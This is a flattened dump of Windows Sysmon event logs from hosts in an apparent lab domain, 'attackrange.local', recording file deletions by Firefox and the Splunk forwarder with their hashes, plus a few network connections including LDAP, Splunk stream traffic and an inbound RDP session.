Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ED934469C1BD232129DBB129F5346076,SHA256=27D1726CC3D75A72FE6A44116C0B5DB18E9452F1F3C5FC2007BE17C39D1FB363,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B763D3E59D99DD894AC7202596875F56,SHA256=B8A9C03EC25A2AE945DA0950E0198FB74FEA40D2A7F962F140EAE7724B22FF1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DA7E671A6DCB35CE2AF1429D47884668,SHA256=86C45333EDB7A0855366D1267E9266DD336783A26831027E711BA3896DD5CB61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2969D6F659F665766AC35DC7A220B3DA,SHA256=96818C32E32A64710E77D001CAB246DDF4D608DF4F8678A0A13E0901D6247394,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=81057BAC82AE81D315EE7F26A712C036,SHA256=105666E0549EA4168E8B1F23D3BAEED7A103E6B699CF765DF7EF7B31305AB48C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0BBFF5DC689D8479642C6ADF43503261,SHA256=C3490BA35B0DA0F3ED73D5F561D529F22E7B0BE4F83B1C54B1078D10E76FABA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=43AC3ADAF0510569267C5B4C2A49C84F,SHA256=817CDF6F4796AE79E7066780D772E70F5BD89CFF5048AA574CFB181B28B968F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CD3063D93783F9A91BAB7DF9F836E803,SHA256=4D7CBD4D4682EF42A840FCF34917AA4F8E8202B26362CA4DF63EF99655DFA4FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:11.819{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C47AB2E29C038AE955C3F0D23B83EC11,SHA256=13241980745EF4E54014CDEB826F77A5FF96371C030157DB76DE06CDDBACB32D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:11.422{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82A8A3CE0A2B5F65367E5520C89E5A29,SHA256=67A6291F3EE2C9A81285ACBFA0EA254A3A012DB2C72297EE84A7DC9B5D5AF656,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:03.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62018-false10.0.1.12-8000- 23542300x80000000000000001055774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:11.454{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11D9B9A5B36C19BEE0A71016E68687F1,SHA256=5CB353F6D0CB319F2C4E05F78FD54BFF5B9C6FD908F5A7A973ACDF0690C0F6D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:12.838{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=157BB16B1BF62A27E880E5FF84429401,SHA256=0BA7EF3C774797E546E2BF151292CFAFC3BAF31EADB39EBA17FC5E98468180C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:12.438{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BAD55CE88917721C0E3CDA9E10FBE35,SHA256=4FDA3F702B0112BD4B28BF4680B009DA3AF8580800941A2F6DD3448995C3D521,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:10.368{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57513-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:13.853{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE970960B93E29FCD4D1C6C2C67EEDE8,SHA256=15AE34B13F43EC8BB079455A470C41107A7817F251CAB02EB0D9D9CFDE80B5B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:13.438{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=257E57710652BD689D8039C9E18BFFA7,SHA256=FD4A1747CB36C6008DBDD791DC0F2E4954394009EC960C83141A20D7ECF70F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:14.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F444D338EAA82D61CCFE8AD6D7463C17,SHA256=7ABB664000109C5E523C86B67A31EC6CDE96789176F9DF0B9BC7E66D2C6223B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:14.453{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EBE3132AB8B5BDE3B26B883AD627755,SHA256=6E5196740E40293EC1F789C7F92E1FA6EB1AB42CF29210EC94F3E98FD76451A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:15.899{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B9AA9B959B0503282C8615996D3C971,SHA256=95703757889BF2A114DB1FE99823A1099450FEBAF43F538FBF592A408FC0DEE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:15.496{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BCD55DCA5161A715C36590D78CA3D47,SHA256=DEDDC1A187CB15BD515F40D9821BE5923C3BF9F5BA1A0F84F656BA7B74134895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:15.668{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95AE3592702413148055EA5B06620AA0,SHA256=33D8C0F54254ED2E7D05DD6B2966B388E52DC8BDF70C8B286454FE70FE84B52B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:16.917{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DE85E9973DC78AFA188786E885289C0,SHA256=EF7A9DC1F95AAFF4FC6589D7B780BA880B13CC748976D76D5318CC0A4E745D1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:16.527{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D806F83EA671F66E87B889A61F3E84F,SHA256=D7E1668027CA34E14704F25F35AAF95EBA95E2FCD3372AE3731C17A05FE82546,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:08.160{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62019-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001055782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:08.159{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62019-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001055786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:17.935{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12CF4CBFB56756F172D84E1EB9C86519,SHA256=1A3D20F12206C27B6BDDE3360260DB81B6B94F623404A577244B5A6C7C9B8EA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:17.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A280BB841E64DDDB93DF5490D930058,SHA256=5EE5D63A62785A0D4F36A7928077016C0D455F96CC3C9F196617879EA33E016D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:09.621{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62020-false10.0.1.12-8000- 
23542300x80000000000000001055788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:18.950{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89F182050D3C54D037FD635033C04D59,SHA256=7ED359DCCAFE504159F41FAB5E15FFD06AD37DBF43D218E3DEF2BF3324003BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:18.590{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C6828D6D5E6A63F191E309176A0EF0,SHA256=8461A6D669A2B2A986720622EC57CBCC452CB9342DA42A4EEE236F6818CE7C77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:18.597{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:16.364{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57514-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
23542300x80000000000000001055791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:19.951{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BD647A2B4744D471A563D8E5350A043,SHA256=7C278D1A2ED2D3410D158DAE2C28AF3FC12DB03D9F784285FF350D40AEDDC6F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:19.621{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3412D0176D21312CB037342EBB7D15A,SHA256=8BE164D8D63A874D71E5268747BDD5180EAD086D295E1C5014997EE0F5DA11CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:11.256{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-64287-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001055789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:19.065{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A2443A640909930984C6C1CCDED91C00,SHA256=E52F7DBEE3F73CB44A69A27D20060EF1826E67C69A31F2412686A39D3F182B68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:20.966{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7B24A0D72615EDDD2189E192B107F4E,SHA256=41255CA65A7453E5758EAC2412E38D6CBA60896A1405FABDE6FA231479EF0DA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:20.949{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:20.652{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BADF3580C7012626DB0B89D75E4903DA,SHA256=B031FBF862F9B6612BAA3214B88E8A2BB1AAF207AE6B1CCBA663D75318CE1F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.182{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5AA4E6E5FF41BDB549FEB49995ECA8BD,SHA256=C9ACEAAB267FF17AE75E218780D5FF677CE46308111853CCAB6DA7E78B03F102,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A2EA3EF03F2A9D558CA6B7EB0B920D66,SHA256=6C975BD43F171E7ACF7DA39CB2C9A385735308B0D6F654605BFDCB44489C0D74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7DC5EB766EE31B1C6EF737F284EC4B92,SHA256=1B9A78FB3634B72ACEAD6717A291D8E20997E9FD07808BCDA2D6F5F0CE8BFE24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=53FD997FDE0DF159F970A6E024565C0A,SHA256=105369FE5960ED089E11BC62781C04B14C5C3CB1E65EFCC79DB6C6023EFC0385,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5C326A80E2E3924B6935A07FF29163B2,SHA256=0C943C3DCD6F04CC5BC86E9AA15EBD3B11D8381F68A9A7E11A3C66357F6EF206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CE97FB915C2B8B5564948AF626CF5DC3,SHA256=733925BD65F83B0E3C83F8166B674C58974CBB62FD906247B7EEC75C7635CBDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2C9D3EC53BE0687D33D57EBA09BB4018,SHA256=19A3A197BDE3C2172AF6CF8BE97B9E75D2DE8000FAC05F06C50265B61ACE80F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4D3A8FEAE31A93EDCD1FC82A28449FB6,SHA256=C7B863805216415B4B10DE5912946CA172E3EEF2FB2425FDE903560A48F2C1F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CC76704099FE2489F9130A238F87C523,SHA256=348B305A1FB1558A3ADCAEF99C96A9C1CCC927C7CB5720FC173D4C69762A40BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E8E577CCC7362A85930D7660F9076910,SHA256=14637A15621C6219EF0F85B2C5689DC7A83AB0B475518B10EF2C18204B7824B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.166{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4302EBED84783A059217B1CB32F89806,SHA256=D3E1FFFADCDE86A5BF94280861604067505F179AB32FA7499D103E46A031F5A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:21.969{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18D733440D4F47DA5479CCA05EE0605D,SHA256=A58067DAF7B5D9D765807C2C53B96C0B35C6DB7B874DB454CEE198FD8013E0BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:21.683{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2158F1EF446E7FDBEBD84136D81A5ECB,SHA256=862ADDF7DE94230CE026E97C851E45336745050694B45A8443D0598C4C04E461,IMPHASH=00000000000000000000000000000000falsetrue 
